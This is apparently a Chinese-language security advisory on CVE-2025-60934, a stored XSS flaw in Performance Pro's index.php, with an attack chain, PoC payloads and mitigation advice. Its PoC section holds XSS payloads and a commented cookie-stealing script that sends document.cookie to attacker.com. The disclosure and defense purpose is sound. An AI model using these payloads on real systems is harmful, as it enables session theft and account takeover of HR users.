CVE-2025-60934：HR Performance Solutions Performance Pro 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-60934

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

HR Performance Solutions Performance Pro

漏洞概述

CVE-2025-60934是HR Performance Solutions Performance Pro v3.19.17中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞位于Performance Pro应用程序的index.php组件中，攻击者可以通过精心构造的恶意负载注入到Employee Notes（员工备注）、title（标题）或description（描述）参数中，从而在受害者浏览器中执行任意Web脚本或HTML代码。

该漏洞的CVSS 3.1评分为6.1，属于中危级别。攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需认证（PR:N），但需要用户交互（UI:R）。该漏洞的影响范围已变更（S:C），表明漏洞可能影响超出受影响组件的其他组件。机密性影响为低（C:L），完整性影响为低（I:L），可用性影响为无（A:N）。

存储型XSS漏洞的危害性通常较高，因为恶意脚本会被持久化存储在服务器端，每当有合法用户访问受影响的页面时，恶意脚本都会自动执行。攻击者可以利用此漏洞窃取用户的会话cookie、劫持用户账户、进行钓鱼攻击、传播恶意软件，或者通过受信任的网站对其他用户发起进一步攻击。在HR绩效管理系统中，此类漏洞可能导致员工敏感绩效数据泄露或被篡改，对企业的人力资源管理安全构成严重威胁。

该漏洞的官方修复版本为PP-Release-6.3.2.0，建议所有使用受影响版本的用户尽快升级到该修复版本以消除安全风险。

技术细节

该漏洞属于典型的存储型XSS漏洞，其根本原因在于Performance Pro v3.19.17的index.php组件在处理用户输入时未对Employee Notes、title和description参数进行充分的输出编码和输入验证。

从技术原理来看，存储型XSS（也称为持久型XSS）与反射型XSS的主要区别在于：恶意负载被永久存储在目标服务器的数据库或文件系统中。当其他用户请求包含恶意内容的页面时，服务器从存储中检索该内容并将其嵌入到响应页面中返回给浏览器，由于内容未经过适当的HTML实体编码，浏览器将其解析为可执行脚本而非纯文本。

在本漏洞中，攻击者可以通过以下方式利用：
1. 攻击者通过正常渠道（如提交绩效评估、添加员工备注等）向目标系统的index.php提交包含恶意JavaScript代码的请求；
2. 由于服务器端未对输入进行过滤或转义处理，恶意脚本被直接存储到后端数据库中；
3. 当管理员或其他有权限的用户查看包含该恶意内容的页面时，浏览器会自动执行嵌入的恶意脚本；
4. 恶意脚本在受害者的浏览器上下文中执行，可以访问会话cookie、DOM对象、发起CSRF请求等。

由于该漏洞无需认证即可利用（PR:N），但需要用户交互（UI:R），这意味着攻击者需要诱导受害者访问包含恶意内容的页面，或者等待合法用户触发。漏洞的影响范围已变更（S:C），表明利用该漏洞可能影响到应用的其他安全区域。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统正在运行HR Performance Solutions Performance Pro v3.19.17，通过公开信息或指纹识别确认存在CVE-2025-60934漏洞。

STEP 2

步骤2：构造恶意负载

攻击者精心构造包含恶意JavaScript代码的XSS负载，准备通过Employee Notes、title或description参数注入。

STEP 3

步骤3：提交恶意内容

攻击者通过正常的功能接口（如提交绩效评估、添加备注等）将恶意负载提交到index.php，由于服务器未进行输入过滤，恶意脚本被存储到后端数据库。

STEP 4

步骤4：等待受害者访问

攻击者等待管理员或其他有权限的用户访问包含恶意内容的页面，或通过社会工程学诱导受害者访问。

STEP 5

步骤5：恶意脚本执行

受害者在浏览器中查看包含恶意内容的页面时，嵌入的JavaScript代码自动执行，可窃取会话cookie、劫持账户或执行其他恶意操作。

STEP 6

步骤6：权限提升与数据窃取

攻击者利用窃取的会话信息冒充合法用户，访问敏感的HR绩效数据，或在受信任的上下文中执行进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-60934 PoC - Stored XSS in HR Performance Solutions Performance Pro -->
<!-- Vulnerable parameters: Employee Notes, title, description -->

<!-- Example 1: Inject via Employee Notes parameter -->
<script>alert('XSS-Via-EmployeeNotes')</script>

<!-- Example 2: Inject via title parameter -->
<img src=x onerror=alert(document.cookie)>

<!-- Example 3: Inject via description parameter -->
<svg onload=alert('XSS-Via-Description')>

<!-- HTTP Request Example (conceptual) -->
<!--
POST /index.php HTTP/1.1
Host: target-performance-pro.com
Content-Type: application/x-www-form-urlencoded

employee_notes=<script>alert('Stored-XSS')</script>&title=<img src=x onerror=alert(1)>&description=<svg onload=alert(1)>
-->

<!-- Cookie Stealing Payload Example -->
<!-- <script>document.location='http://attacker.com/steal?c='+document.cookie</script> -->

影响范围

HR Performance Solutions Performance Pro < PP-Release-6.3.2.0

HR Performance Solutions Performance Pro v3.19.17

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）对index.php组件中Employee Notes、title、description等参数实施输入白名单过滤，禁止特殊字符（如<、>、"、'、&等）的输入；2）在输出层面对用户输入进行HTML实体编码；3）部署Web应用防火墙（WAF）规则，拦截常见的XSS攻击负载；4）限制未认证用户对相关功能的访问权限；5）启用内容安全策略（CSP）头部，限制内联脚本的执行；6）密切监控系统日志，及时发现可疑的注入尝试。建议尽快升级到PP-Release-6.3.2.0修复版本以彻底解决该漏洞。